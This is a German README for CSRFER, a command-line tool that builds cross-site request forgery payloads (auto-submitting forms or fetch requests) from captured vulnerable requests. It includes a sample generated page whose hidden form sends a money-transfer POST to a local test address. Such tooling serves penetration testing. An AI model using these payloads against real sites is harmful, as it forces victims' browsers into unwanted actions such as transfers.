
Tool zum Generieren von CSRF-Payloads basierend auf anfälligen Anfragen
_____ _________________ ___________
/ __ \/ ___| ___ \ ___| ___| ___ \
| / \/\ `--.| |_/ / |_ | |__ | |_/ /
| | `--. \ /| _| | __|| /
| \__/\/\__/ / |\ \| | | |___| |\ \
\____/\____/\_| \_\_| \____/\_| \_|
-.--.
) " '-,
',' 2 \_
\q \ . \
_.--' '----.__
/ ._ _.__ \__
_.'_.' \_ .-._\_ '-, }
(,/ _.---;-( . \ \ ~
____ ( .___\_\ \/_/
( '-._ \ \ |
'._ ),> _) >
'-._ c=' Cooo -._
'-._ '.
'-._ `\
snd '-._ '.
'-._ \
`~---'
CSRFER ist ein Werkzeug zur Generierung von CSRF-Payloads auf Basis anfälliger Anfragen.
Es analysiert bereitgestellte Anfragen und generiert entweder ein Formular oder eine fetch-Anforderung. Der Payload kann dann in eine HTML-Vorlage eingebettet werden.
npm install -g csrfer
Usage: csrfer [options]
Options:
--version Zeigt die Versionsnummer an
-r, --request Pfad zur Anforderungsdatei, die verwendet werden soll
-m, --mode Modus zum Generieren des Codes. Verfügbare Optionen: form, fetch. (Standard ist form)
-a, --autosubmit Sendet die Anfrage automatisch beim Laden der Seite
-s, --show Zeigt die Formulareingaben (nur im Modus form)
-o, --output Gibt den Payload in die angegebene Datei aus anstatt auf STDOUT
-t, --template Pfad zu einer HTML-Vorlagenseite. Verwende den Platzhalter {{CONTENT}}, um anzugeben,
wo der Code eingefügt werden soll (in HTML, nicht in JS)
-T, --defaulttemplate Diese Option verwenden, wenn der Code in eine Standard-HTML-Seite eingefügt werden soll.
-h, --help Zeigt die Hilfe an
Beispiele:
csrfer -r req.txt -m form -a Sendet automatisch eine Formularanfrage ab
csrfer -r req.txt -m form -s Generiert und zeigt ein Formular zur manuellen Übermittlung an
csrfer -r req.txt -m fetch -t my_template.html Generiert eine fetch-Anforderung und verwendet die bereitgestellte
Vorlagenseite
<!DOCTYPE html>
<html>
<head>
<title>This is Hello World page</title>
</head>
<body>
<h1>Hello World</h1>
<form id="csrf" name="csrf" action="http://localhost:8000/1.php" method="POST"
enctype="application/x-www-form-urlencoded"><input id='destination' name='destination' type='hidden'
value='123-123123-123' /><br><input id='amount' name='amount' type='hidden' value='50€' /><br><input
type='submit' value='submit'></form>
</body>
</html>
Dieses Projekt ist unter der MIT-Lizenz lizenziert.